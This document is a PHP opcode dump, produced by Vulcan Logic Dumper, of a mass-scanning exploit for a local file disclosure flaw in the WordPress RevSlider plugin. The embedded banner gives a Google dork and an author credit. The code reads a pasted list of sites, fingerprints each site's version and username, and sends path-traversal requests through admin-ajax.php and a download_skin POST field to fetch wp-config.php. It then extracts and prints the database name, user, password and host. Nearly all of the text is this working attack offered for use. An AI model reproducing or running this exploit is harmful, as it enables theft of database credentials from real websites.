Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 77) Position 1 = 17, Position 2 = 297 Branch analysis from position: 17 2 jumps found. (Code = 78) Position 1 = 18, Position 2 = 297 Branch analysis from position: 18 2 jumps found. (Code = 43) Position 1 = 63, Position 2 = 76 Branch analysis from position: 63 2 jumps found. (Code = 43) Position 1 = 145, Position 2 = 185 Branch analysis from position: 145 2 jumps found. (Code = 77) Position 1 = 187, Position 2 = 295 Branch analysis from position: 187 2 jumps found. (Code = 78) Position 1 = 188, Position 2 = 295 Branch analysis from position: 188 2 jumps found. (Code = 43) Position 1 = 247, Position 2 = 294 Branch analysis from position: 247 1 jumps found. (Code = 42) Position 1 = 295 Branch analysis from position: 295 1 jumps found. (Code = 42) Position 1 = 17 Branch analysis from position: 17 Branch analysis from position: 294 1 jumps found. (Code = 42) Position 1 = 187 Branch analysis from position: 187 Branch analysis from position: 295 Branch analysis from position: 295 Branch analysis from position: 185 Branch analysis from position: 76 Branch analysis from position: 297 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 297 filename: /in/K4M4q function name: (null) number of ops: 300 compiled vars: !0 = $sites, !1 = $site, !2 = $ch, !3 = $get, !4 = $version, !5 = $str, !6 = $users, !7 = $user, !8 = $wpuser, !9 = $xp, !10 = $DB_NAME, !11 = $DB_USER, !12 = $DB_PASSWORD, !13 = $DB_HOST, !14 = $lt, !15 = $l, !16 = $process, !17 = $return line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 1 0 E > ECHO '%23+Exploit+Title%3A+%5BWordpress+RevSlider+Plugin+LFD%5D%0A%23+Google+Dork%3A+inurl%3A%2Fadmin-ajax.php%3Faction%3Drevslider_show_image%0A%23+Date%3A+12%2F29%2F14%0A%23+Exploit+Author%3A+FarbodEZRaeL%0A%23+Vendor+Homepage%3A+iranhack.org%0A%23+Software+Link%3A+wordpress.org%0A%23+Tested+on%3A+windows%0A%23Exploit%3A%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3EExploits+Wordpress%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+style%3D%22background-color%3A+rebeccapurple%3B%22%3E%0A%0A%3Cpre%3E%3Cp%3E%3Ccenter+style%3D%22color%3A+aqua%3B%22%3E%0A%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%3D+++++++Exploits+Wordpress+RevSlider+Plugin+LFD+Vuln++++++++%3D%0A%3D+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%3D%0A%3D++++++++++++++++++++Coded+by+FarbodEZRaeL++++++++++++++++++%3D%0A%3D++++++++++++++++++++Iranhack+Security+team+++++++++++++++++%3D%0A%3D+++++++++++++++++++++++www.iranhack.org++++++++++++++++++++%3D%0A%3D+++++++++++++++++++++Fix+bug+Other+Version+++++++++++++++++%3D%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%3Cpre%3E%3Chref%3E%0A%3Cform+method%3D%27POST%27%3E%0A%3Ctextarea+name%3D%27sites%27+cols%3D%2745%27+rows%3D%270%27%3E%3C%2Ftextarea%3E%0A%3Cbr%3E%0A%3Cinput+type%3D%27submit%27+value%3D%27Exploit%27+%2F%3E%0A%3C%2Fform%3E%0A%0A' 37 1 BEGIN_SILENCE ~18 2 INIT_FCALL 'set_time_limit' 3 SEND_VAL 0 4 DO_ICALL 5 END_SILENCE ~18 38 6 INIT_FCALL 'error_reporting' 7 SEND_VAL 0 8 DO_ICALL 39 9 INIT_FCALL 'explode' 10 SEND_VAL '%0D%0A' 11 FETCH_R global ~21 '_POST' 12 FETCH_DIM_R ~22 ~21, 'sites' 13 SEND_VAL ~22 14 DO_ICALL $23 15 ASSIGN !0, $23 41 16 > FE_RESET_R $25 !0, ->297 17 > > FE_FETCH_R $25, !1, ->297 43 18 > INIT_FCALL 'trim' 19 SEND_VAR !1 20 DO_ICALL $26 21 ASSIGN !1, $26 45 22 INIT_FCALL_BY_NAME 'curl_init' 23 DO_FCALL 0 $28 24 ASSIGN !2, $28 46 25 INIT_FCALL_BY_NAME 'curl_setopt' 26 SEND_VAR_EX !2 27 FETCH_CONSTANT ~30 'CURLOPT_URL' 28 SEND_VAL_EX ~30 29 CAST 6 ~31 !1 30 SEND_VAL_EX ~31 31 DO_FCALL 0 47 32 INIT_FCALL_BY_NAME 'curl_setopt' 33 SEND_VAR_EX !2 34 FETCH_CONSTANT ~33 'CURLOPT_HEADER' 35 SEND_VAL_EX ~33 36 SEND_VAL_EX 1 37 DO_FCALL 0 48 38 INIT_FCALL_BY_NAME 'curl_setopt' 39 SEND_VAR_EX !2 40 FETCH_CONSTANT ~35 'CURLOPT_RETURNTRANSFER' 41 SEND_VAL_EX ~35 42 SEND_VAL_EX 1 43 DO_FCALL 0 49 44 INIT_FCALL_BY_NAME 'curl_setopt' 45 SEND_VAR_EX !2 46 FETCH_CONSTANT ~37 'CURLOPT_USERAGENT' 47 SEND_VAL_EX ~37 48 SEND_VAL_EX 'Mozilla%2F4.0+%28compatible%3B+MSIE+6.0%3B%0AWindows+NT+5.0%29' 49 DO_FCALL 0 51 50 INIT_FCALL_BY_NAME 'curl_exec' 51 SEND_VAR_EX !2 52 DO_FCALL 0 $39 53 ASSIGN !3, $39 52 54 INIT_FCALL_BY_NAME 'curl_close' 55 SEND_VAR_EX !2 56 DO_FCALL 0 53 57 INIT_FCALL 'preg_match' 58 SEND_VAL '%23WordPress+%28.%2A%3F%29%2F%3E%23' 59 SEND_VAR !3 60 SEND_REF !4 61 DO_ICALL $42 62 > JMPZ $42, ->76 54 63 > INIT_FCALL 'str_replace' 64 SEND_VAL '%2F%3E' 65 SEND_VAL '' 66 FETCH_DIM_R ~43 !4, 0 67 SEND_VAL ~43 68 DO_ICALL $44 69 ASSIGN !5, $44 55 70 INIT_FCALL 'str_replace' 71 SEND_VAL '%22' 72 SEND_VAL '' 73 SEND_VAR !5 74 DO_ICALL $46 75 ASSIGN !5, $46 57 76 > BEGIN_SILENCE ~48 77 INIT_FCALL 'file_get_contents' 78 NOP 79 FAST_CONCAT ~49 !1, '%2F%3Fauthor%3D1' 80 SEND_VAL ~49 81 DO_ICALL $50 82 END_SILENCE ~48 83 ASSIGN !6, $50 58 84 INIT_FCALL 'preg_match' 85 SEND_VAL '%2F%3Ctitle%3E%3B%28.%2A%3F%29%3C%5C%2Ftitle%3E%2Fsi' 86 SEND_VAR !6 87 SEND_REF !7 88 DO_ICALL 59 89 INIT_FCALL 'explode' 90 SEND_VAL '%7C' 91 FETCH_DIM_R ~53 !7, 1 92 SEND_VAL ~53 93 DO_ICALL $54 94 ASSIGN !8, $54 60 95 ECHO '+%3Cbr%3E%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3C%2Fbr%3E' 61 96 CONCAT ~56 'Site+%3A+', !1 97 CONCAT ~57 ~56, '%3Cbr%3E+Wp+User+%3A+' 98 FETCH_DIM_R ~58 !8, 0 99 CONCAT ~59 ~57, ~58 100 CONCAT ~60 ~59, '%3Cbr%3E+Version+%3A%0A' 62 101 CONCAT ~61 ~60, !5 102 CONCAT ~62 ~61, '%3Cbr%3E' 103 ECHO ~62 63 104 INIT_FCALL_BY_NAME 'curl_init' 105 DO_FCALL 0 $63 106 ASSIGN !2, $63 64 107 INIT_FCALL_BY_NAME 'curl_setopt' 108 SEND_VAR_EX !2 109 FETCH_CONSTANT ~65 'CURLOPT_URL' 110 SEND_VAL_EX ~65 65 111 NOP 112 FAST_CONCAT ~66 !1, '%2Fwp-admin%2Fadmin-ajax.php%3Faction%3Drevslider_show_image%26img%3D..%2Fwp-config.php' 113 SEND_VAL_EX ~66 114 DO_FCALL 0 66 115 INIT_FCALL_BY_NAME 'curl_setopt' 116 SEND_VAR_EX !2 117 FETCH_CONSTANT ~68 'CURLOPT_HTTPGET' 118 SEND_VAL_EX ~68 119 SEND_VAL_EX 1 120 DO_FCALL 0 67 121 INIT_FCALL_BY_NAME 'curl_setopt' 122 SEND_VAR_EX !2 123 FETCH_CONSTANT ~70 'CURLOPT_RETURNTRANSFER' 124 SEND_VAL_EX ~70 125 SEND_VAL_EX 1 126 DO_FCALL 0 68 127 INIT_FCALL_BY_NAME 'curl_setopt' 128 SEND_VAR_EX !2 129 FETCH_CONSTANT ~72 'CURLOPT_USERAGENT' 130 SEND_VAL_EX ~72 131 SEND_VAL_EX 'Mozilla%2F4.0+%28compatible%3B+MSIE+5.01%3B%0AWindows+NT+5.0%29' 132 DO_FCALL 0 70 133 INIT_FCALL_BY_NAME 'curl_exec' 134 SEND_VAR_EX !2 135 DO_FCALL 0 $74 136 ASSIGN !9, $74 71 137 INIT_FCALL_BY_NAME 'curl_close' 138 SEND_VAR_EX !2 139 DO_FCALL 0 72 140 INIT_FCALL 'preg_match' 141 SEND_VAL '%23DB_USER%23i' 142 SEND_VAR !9 143 DO_ICALL $77 144 > JMPZ $77, ->185 73 145 > INIT_FCALL 'preg_match' 146 SEND_VAL '%23%27DB_NAME%27%2C+%27%28.%2A%3F%29%27%23i' 147 SEND_VAR !9 148 SEND_REF !10 149 DO_ICALL 74 150 ROPE_INIT 3 ~81 'DB_NAME%3A' 151 FETCH_DIM_R ~79 !10, 1 152 ROPE_ADD 1 ~81 ~81, ~79 153 ROPE_END 2 ~80 ~81, '%3Cbr%3E' 154 ECHO ~80 75 155 INIT_FCALL 'preg_match' 156 SEND_VAL '%23%27DB_USER%27%2C+%27%28.%2A%3F%29%27%23i' 157 SEND_VAR !9 158 SEND_REF !11 159 DO_ICALL 76 160 ROPE_INIT 3 ~86 'DB_USER%3A' 161 FETCH_DIM_R ~84 !11, 1 162 ROPE_ADD 1 ~86 ~86, ~84 163 ROPE_END 2 ~85 ~86, '%3Cbr%3E' 164 ECHO ~85 77 165 INIT_FCALL 'preg_match' 166 SEND_VAL '%23%27DB_PASSWORD%27%2C+%27%28.%2A%3F%29%27%23i' 167 SEND_VAR !9 168 SEND_REF !12 169 DO_ICALL 78 170 ROPE_INIT 3 ~91 'DB_PASSWORD%3A' 171 FETCH_DIM_R ~89 !12, 1 172 ROPE_ADD 1 ~91 ~91, ~89 173 ROPE_END 2 ~90 ~91, '%3Cbr%3E' 174 ECHO ~90 79 175 INIT_FCALL 'preg_match' 176 SEND_VAL '%23%27DB_HOST%27%2C+%27%28.%2A%3F%29%27%23i' 177 SEND_VAR !9 178 SEND_REF !13 179 DO_ICALL 80 180 ROPE_INIT 3 ~96 'DB_HOST%3A' 181 FETCH_DIM_R ~94 !13, 1 182 ROPE_ADD 1 ~96 ~96, ~94 183 ROPE_END 2 ~95 ~96, '%3Cbr%3E' 184 ECHO ~95 84 185 > ASSIGN !14, <array> 86 186 > FE_RESET_R $99 !14, ->295 187 > > FE_FETCH_R $99, !15, ->295 87 188 > ROPE_INIT 3 ~101 !1 189 ROPE_ADD 1 ~101 ~101, '%2F' 190 ROPE_END 2 ~100 ~101, !15 191 ASSIGN !1, ~100 88 192 INIT_FCALL_BY_NAME 'curl_init' 193 SEND_VAR_EX !1 194 DO_FCALL 0 $104 195 ASSIGN !16, $104 89 196 INIT_FCALL_BY_NAME 'curl_setopt' 197 SEND_VAR_EX !16 198 FETCH_CONSTANT ~106 'CURLOPT_TIMEOUT' 199 SEND_VAL_EX ~106 200 SEND_VAL_EX 30 201 DO_FCALL 0 90 202 INIT_FCALL_BY_NAME 'curl_setopt' 203 SEND_VAR_EX !16 204 FETCH_CONSTANT ~108 'CURLOPT_USERAGENT' 205 SEND_VAL_EX ~108 206 SEND_VAL_EX 'Mozilla%2F4.0+%28compatible%3B+MSIE%0A7.0%3B+Windows+NT+6.0%29' 207 DO_FCALL 0 92 208 INIT_FCALL_BY_NAME 'curl_setopt' 209 SEND_VAR_EX !16 210 FETCH_CONSTANT ~110 'CURLOPT_HEADER' 211 SEND_VAL_EX ~110 212 SEND_VAL_EX <true> 213 DO_FCALL 0 93 214 INIT_FCALL_BY_NAME 'curl_setopt' 215 SEND_VAR_EX !16 216 FETCH_CONSTANT ~112 'CURLOPT_POST' 217 SEND_VAL_EX ~112 218 SEND_VAL_EX 1 219 DO_FCALL 0 94 220 INIT_FCALL_BY_NAME 'curl_setopt' 221 SEND_VAR_EX !16 222 FETCH_CONSTANT ~114 'CURLOPT_POSTFIELDS' 223 SEND_VAL_EX ~114 95 224 SEND_VAL_EX '_mysite_download_skin%3D..%2F..%2F..%2F..%2F..%2Fwp-config.php' 225 DO_FCALL 0 96 226 INIT_FCALL_BY_NAME 'curl_setopt' 227 SEND_VAR_EX !16 228 FETCH_CONSTANT ~116 'CURLOPT_RETURNTRANSFER' 229 SEND_VAL_EX ~116 230 SEND_VAL_EX 1 231 DO_FCALL 0 97 232 INIT_FCALL_BY_NAME 'curl_setopt' 233 SEND_VAR_EX !16 234 FETCH_CONSTANT ~118 'CURLOPT_FOLLOWLOCATION' 235 SEND_VAL_EX ~118 236 SEND_VAL_EX 1 237 DO_FCALL 0 98 238 INIT_FCALL_BY_NAME 'curl_exec' 239 SEND_VAR_EX !16 240 DO_FCALL 0 $120 241 ASSIGN !17, $120 99 242 INIT_FCALL 'preg_match' 243 SEND_VAL '%23DB_USER%23i' 244 SEND_VAR !17 245 DO_ICALL $122 246 > JMPZ $122, ->294 100 247 > INIT_FCALL 'preg_match' 248 SEND_VAL '%23%27DB_NAME%27%2C+%27%28.%2A%3F%29%27%23i' 249 SEND_VAR !17 250 SEND_REF !10 251 DO_ICALL 101 252 ROPE_INIT 3 ~126 'DB_NAME%3A' 253 FETCH_DIM_R ~124 !10, 1 254 ROPE_ADD 1 ~126 ~126, ~124 255 ROPE_END 2 ~125 ~126, '%3Cbr%3E' 256 ECHO ~125 102 257 INIT_FCALL 'preg_match' 258 SEND_VAL '%23%27DB_USER%27%2C+%27%28.%2A%3F%29%27%23i' 259 SEND_VAR !17 260 SEND_REF !11 261 DO_ICALL 103 262 ROPE_INIT 3 ~131 'DB_USER%3A' 263 FETCH_DIM_R ~129 !11, 1 264 ROPE_ADD 1 ~131 ~131, ~129 265 ROPE_END 2 ~130 ~131, '%3Cbr%3E' 266 ECHO ~130 104 267 INIT_FCALL 'preg_match' 268 SEND_VAL '%23%27DB_PASSWORD%27%2C+%27%28.%2A%3F%29%27%23i' 269 SEND_VAR !17 270 SEND_REF !12 271 DO_ICALL 105 272 ROPE_INIT 3 ~136 'DB_PASSWORD%3A' 273 FETCH_DIM_R ~134 !12, 1 274 ROPE_ADD 1 ~136 ~136, ~134 275 ROPE_END 2 ~135 ~136, '%3Cbr%3E' 276 ECHO ~135 106 277 INIT_FCALL 'preg_match' 278 SEND_VAL '%23%27DB_HOST%27%2C+%27%28.%2A%3F%29%27%23i' 279 SEND_VAR !17 280 SEND_REF !13 281 DO_ICALL 107 282 ROPE_INIT 3 ~141 'DB_HOST%3A' 283 FETCH_DIM_R ~139 !13, 1 284 ROPE_ADD 1 ~141 ~141, ~139 285 ROPE_END 2 ~140 ~141, '%3Cbr%3E' 286 ECHO ~140 108 287 > JMP ->295 109 288* ECHO '+%3Cbr%3E-----------------------------------%3C%2Fbr%3E' 110 289* INIT_FCALL 'ob_implicit_flush' 290* SEND_VAL <true> 291* DO_ICALL 111 292* INIT_FCALL 'ob_end_flush' 293* DO_ICALL 86 294 > > JMP ->187 295 > FE_FREE $99 41 296 > JMP ->17 297 > FE_FREE $25 117 298 ECHO '%3C%2Fpre%3E%3C%2Fp%3E%3C%2Fcenter%3E' 299 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0